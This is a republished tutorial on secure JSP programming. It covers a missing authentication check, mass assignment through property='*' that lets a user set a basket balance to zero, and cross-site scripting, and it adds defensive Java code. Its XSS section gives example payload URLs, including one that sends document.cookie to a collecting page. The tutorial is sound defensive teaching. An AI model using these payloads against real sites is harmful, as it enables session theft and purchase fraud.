Introduction to security programming examples in JSP tutorials

Source: Internet
Author: User

JavaServer Pages (JSP) is becoming increasingly popular as a technology for building dynamic web pages. In this JSP tutorial we will look at secure programming through JSP examples.

JSP differs from ASP and PHP in how it works. JSP pages are compiled rather than interpreted at execution time: the first call to a JSP file is in fact a compilation into a Servlet. When the browser requests the JSP file, the server checks whether the file has changed since it was last compiled. If it has not changed, the server runs the existing Servlet directly without re-compiling, which improves efficiency significantly.

Today I will look at JSP security with you from the perspective of script programming. Security risks such as source code exposure are not covered in this article. Its main purpose is to remind JSP beginners that an awareness of secure programming should be cultivated from the very beginning, so that mistakes which should never be made, and the losses they may cause, are avoided.

1. For entry-level JSP learners, lax authentication is a basic mistake

Take the secure programming of a forum as an example.

user_manager.jsp is a user-management page. The author knows it is sensitive and adds a lock:

    <%
    // session.getValue() is the old name for session.getAttribute()
    if (session.getValue("UserName") == null || session.getValue("UserClass") == null
            || !session.getValue("UserClass").equals("System Administrator")) {
        response.sendRedirect("err.jsp?Id=14");
        return;
    }
    %>

To view and modify a user's information, the file modifyuser_manager.jsp is used. When the administrator submits

http://localhost/yyforum/modifyuser_manager.jsp?modifyid=51

the user with ID 51 is viewed and modified (the default user ID of the data administrator is 51). However, this important file has no authentication of its own: ordinary users, including guests, can submit the request above directly and view everything, including the password, which is also stored and displayed in plaintext. modifyuser_manager.jsp is a wide-open portal page: nothing is noticed until a malicious user has completed the data update and been redirected to user_manager.jsp. Obviously, locking only one door is far from enough. While programming, you must add authentication to every place that requires identity authentication.
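One way to make "every place" hold the same lock, as an added example that is not part of the original article: a servlet Filter that applies the administrator check from user_manager.jsp to a whole directory of management pages. It assumes the session attributes "UserName" and "UserClass" and the err.jsp?Id=14 redirect used above; the /manager/* URL pattern (management pages moved under one directory) is a hypothetical layout.

```java
// Added example, not the forum's own code. One Filter enforces the
// administrator check for every page under /manager/, so a single page such as
// modifyuser_manager.jsp cannot be forgotten. Attribute names and the redirect
// target follow the article; the URL pattern is an assumed layout.
import java.io.IOException;
import javax.servlet.*;
import javax.servlet.annotation.WebFilter;
import javax.servlet.http.*;

@WebFilter("/manager/*")   // hypothetical: all management JSPs live here
public class AdminOnlyFilter implements Filter {

    // Same rule as the lock in user_manager.jsp, written with getAttribute().
    static boolean isAdministrator(HttpSession session) {
        if (session == null) {
            return false;
        }
        Object userName = session.getAttribute("UserName");
        Object userClass = session.getAttribute("UserClass");
        return userName != null && "System Administrator".equals(userClass);
    }

    @Override
    public void doFilter(ServletRequest req, ServletResponse res, FilterChain chain)
            throws IOException, ServletException {
        HttpServletRequest request = (HttpServletRequest) req;
        HttpServletResponse response = (HttpServletResponse) res;
        // getSession(false): do not create a session for anonymous visitors.
        if (!isAdministrator(request.getSession(false))) {
            response.sendRedirect(request.getContextPath() + "/err.jsp?Id=14");
            return;   // the protected page is never reached
        }
        chain.doFilter(req, res);
    }

    @Override
    public void init(FilterConfig config) {}

    @Override
    public void destroy() {}
}
```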

2. Guard the entry points of JavaBeans in secure programming

The core of JSP component technology is JavaBeans. Logic control and database operations can be placed in JavaBean components and then called from the JSP file. This makes the program clearer and more reusable. Compared with traditional ASP or PHP pages, JSP pages are very simple because much of the dynamic page processing can be encapsulated in JavaBeans.

To change a JavaBean property, use the <jsp:setProperty> tag.

The following code is part of the source of a hypothetical e-shopping system. This file displays the contents of the user's shopping basket, while checkout.jsp is used for checkout.

    <jsp:useBean id="myBasket" class="BasketBean">
    <jsp:setProperty name="myBasket" property="*"/>
    </jsp:useBean>
    <html>
    <head><title>Your Basket</title></head>
    <body>
    <p>
    You have added the item
    <jsp:getProperty name="myBasket" property="newItem"/>
    to your basket.
    <br/>
    Your total is $
    <jsp:getProperty name="myBasket" property="balance"/>
    Proceed to <a href="checkout.jsp">checkout</a>
    </p>
    </body>
    </html>

Have you noticed property="*"? It means that the values of all variables entered on the visible JSP page, or submitted directly through the query string, are stored in the bean properties with matching names.

Generally, the user submits the request as follows:

http://www.somesite.com/addToBasket.jsp?newItem=ITEM0105342

But what about unruly users? They may submit:

http://localhost/addToBasket.jsp?newItem=ITEM0105342&balance=0

In this way, balance=0 is stored in the JavaBean. When they click "checkout" to settle the bill, the purchase is free.

This is similar to the security problems caused by global variables in PHP. It can be seen that property="*" must be used with caution!
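A BasketBean written so that the request above cannot change the total, as an added example that is not part of the original article. <jsp:setProperty property="*"/> only invokes public setters whose names match request parameters, so the bean exposes a setter for newItem alone and derives balance on the server; the item code, price list and the pattern ITEM followed by seven digits are constructed sample data.

```java
// Added example, not the article's code. Only newItem has a setter, so
// ?balance=0 in the query string has nothing to bind to and is ignored.
// Binding the single property explicitly, <jsp:setProperty name="myBasket"
// property="newItem"/>, is the other half of the same defence.
import java.math.BigDecimal;
import java.util.ArrayList;
import java.util.List;
import java.util.Map;

public class BasketBean implements java.io.Serializable {
    // Constructed price list standing in for a database lookup.
    private static final Map<String, BigDecimal> PRICES = Map.of(
            "ITEM0105342", new BigDecimal("19.99"),
            "ITEM0105343", new BigDecimal("5.00"));

    private final List<String> items = new ArrayList<>();
    private String newItem;

    // Request parameter "newItem" binds here; the value is validated before use.
    public void setNewItem(String newItem) {
        if (newItem == null || !newItem.matches("ITEM\\d{7}") || !PRICES.containsKey(newItem)) {
            throw new IllegalArgumentException("unknown item: " + newItem);
        }
        this.newItem = newItem;
        items.add(newItem);
    }

    public String getNewItem() {
        return newItem;
    }

    // Read-only: there is deliberately no setBalance(). The total is computed
    // from the server-side price list, never taken from the client.
    public BigDecimal getBalance() {
        BigDecimal total = BigDecimal.ZERO;
        for (String code : items) {
            total = total.add(PRICES.get(code));
        }
        return total;
    }
}
```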

3. Ever-increasing Cross-Site Scripting

Cross-Site Scripting (XSS) refers to inserting malicious JavaScript, VBScript, ActiveX, HTML or Flash into the HTML of a remote web page in order to steal the privacy of users browsing that page, change user settings or corrupt user data. In most cases XSS attacks do not affect the running of the server or the web application, but they pose a serious threat to the security of clients.

Here is a simple forum example. When we submit

http://localhost/acjspbbs/dispuser.jsp?name=someuser<script>alert(document.cookie)</script>

a dialog box containing your cookie is displayed. And submitting

http://localhost/acjspbbs/dispuser.jsp?name=someuser<script>document.location='http://www.163.com'</script>

redirects you to Netease.

When the value of the "name" variable is returned to the client, the script neither encodes nor filters malicious code. When a user opens a link with a malicious "name" value embedded in it, the script code is executed in the user's browser, which can lead to leaks of user privacy and other consequences. For example, the link:

http://localhost/acjspbbs/dispuser.jsp?name=someuser<script>document.location='http://localhost/xxx.xxx?'+document.cookie</script>

Here xxx.xxx stands for a page that collects the parameter passed to it; the parameter is document.cookie, that is, the cookie of the user who accessed the link. In the ASP world many people have perfected cookie stealing, and reading cookies in JSP is no harder. Of course, cross-site scripting is by no means limited to stealing cookies. I believe everyone understands this, so I will not expand on it here.

Encoding the input and output of all dynamic pages can avoid cross-site scripting attacks to a large extent. Unfortunately, encoding all untrusted data is resource-intensive and may affect web server performance. The common method is therefore to filter input data. For example, the following code replaces dangerous characters:

    <%
    String message = request.getParameter("message");
    if (message != null) {   // getParameter() returns null when the parameter is absent
        message = message.replace('<', '_');
        message = message.replace('>', '_');
        message = message.replace('"', '_');
        message = message.replace('\'', '_');
        message = message.replace('%', '_');
    }
    %>
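The encoding alternative mentioned above, as an added example that is not part of the original article: a helper that escapes untrusted values for an HTML text or attribute context at output time, so the "name" value from dispuser.jsp is displayed literally instead of being replaced with underscores. The class name and the sample value are assumptions.

```java
// Added example, not the article's code. Encodes the five characters that can
// end an HTML text node or attribute value; call it on every untrusted value
// as it is written into the page, e.g. <%= HtmlEncoder.forHtml(name) %>.
public final class HtmlEncoder {
    private HtmlEncoder() {}

    public static String forHtml(String input) {
        if (input == null) {
            return "";   // an absent parameter renders as nothing, not "null"
        }
        StringBuilder out = new StringBuilder(input.length() + 16);
        for (int i = 0; i < input.length(); i++) {
            char c = input.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;");  break;   // must be first-class: keeps entities literal
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    // Constructed sample: the forum payload from the article, rendered as text.
    public static void main(String[] args) {
        String name = "someuser<script>alert(document.cookie)</script>";
        System.out.println(forHtml(name));
    }
}
```

Unlike the replace chain, the original characters remain readable to the user, and '&' is encoded so that an attacker cannot smuggle in pre-encoded entities.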
